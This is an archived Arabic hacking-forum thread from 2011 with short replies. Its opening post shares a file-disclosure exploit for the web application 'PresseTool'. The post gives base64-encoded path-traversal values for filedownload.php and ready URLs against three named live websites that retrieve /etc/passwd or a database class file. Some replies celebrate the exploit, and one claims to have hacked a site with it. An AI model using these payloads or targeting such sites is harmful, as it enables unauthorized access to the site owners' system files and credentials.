المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : بمناسبة رجوع المنتدى : شرح ثغرة روعة نزلت في موقع السكورتي



e . V . E . L
05-02-2011, 06:26 PM
السلام عليكم ..

كيفكم يالجيوش ؟؟

ان شاء لله تمام

بمناسبة رجوع المنتدى بعد انقطاعه ليوم او نص يوم تقريبا الحمدالله ..

الثغرة ..


PresseTool <= (/etc/passwd) Disclosure Exploit(Encoded) 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [~] Live Contact : [email protected] [~] E-Mail : [email protected] [~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://exploit-id.com - http://0nto.me/ [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : PresseTool |~Price : N/A |~Version : N/A |~Software: N/A |~Vulnerability Style : /etc/passwd Disclosure |~Vulnerability Dir : / |~Google Keyword : Website by Plinka Design. |[~]Date : "23004.2011" |[~]Tested on : DEMOS ---------------------------------------------------------- filedownload.php <= 'file' Functions Not Security Disclosure file name Encode on base64 algorithm.. classes_class.database.php ENCODED BASE64 Y2xhc3Nlcy9jbGFzcy5EYXRhYmFzZS5waHA= Disclosure Attack ready --------------------------------------------------------- Demos /ETC/PASSWD Disclosure Attack.. http://www.regiocast.de/regiocast/pressetool/filedownload.php?file=Li4vLi4vLi4vLi4vLi4vLi4vLi4v Li4vZXRjL3Bhc3N3ZA== http://www.mir-media.de/pressetool/filedownload.php?file=Li4vLi4vLi4vLi4vLi4vLi4vLi4v Li4vZXRjL3Bhc3N3ZA== http://www.mach3.de/pressetool/filedownload.php?file=Li4vLi4vLi4vLi4vLi4vLi4vLi4v Li4vZXRjL3Bhc3N3ZA== OR classes_class.Database.php <= Disclosure Attack.. http://www.regiocast.de/regiocast/pressetool/filedownload.php?file=Y2xhc3Nlcy9jbGFzcy5EYXRhYmFz ZS5waHA= http://www.mir-media.de/pressetool/filedownload.php?file=Y2xhc3Nlcy9jbGFzcy5EYXRhYmFz ZS5waHA= http://www.mach3.de/pressetool/filedownload.php?file=Y2xhc3Nlcy9jbGFzcy5EYXRhYmFz ZS5waHA=


الشرح ..

http://www.multiupload.com/4HOFSZDZCE

موفقين

wookr
05-02-2011, 06:55 PM
يديك العافيه ايفل الله يسعدك يارب على الشرحٍ . .

V!RUS TROJAN
05-02-2011, 07:21 PM
يعطيك الف عافيه يا وحش الجيوش... مشكور يا معلم !??

Hidden pain
05-03-2011, 01:12 AM
ثغرة قوية إيفل ..
دوما مواضيعك جميلة

Trip-loss
05-03-2011, 04:15 AM
مشكور يا غالي ..
ننتظر المزيد من ابداعك ..

Mr-abdsamad
05-03-2011, 10:01 PM
sa3b awiiii ya akhoooy

Ace
05-03-2011, 10:05 PM
بارك الله فيك مبدع استمر

HaCkeRz3_____ AaLlGEEr!Ia
05-05-2011, 03:47 AM
شكرا موضوع مفيد و ثغرة رائعة لتسهيل الاختراق علينا
تسلم

a.s.n
05-05-2011, 05:26 PM
الثغره جامده اخترقت نص موقع بها

دلول
05-05-2011, 07:30 PM
عووووووووووووووووووافي

شمالي عرعر
01-28-2012, 11:05 AM
السلاام عليكم مسااء الخيررر
معليش ثغره مو حلووه واصلا اسمها مو ثغره اسمهاا تعليم المبتداين
يسلمو على كل حال

sssssss
01-28-2012, 04:06 PM
اكثر من رائح مرسي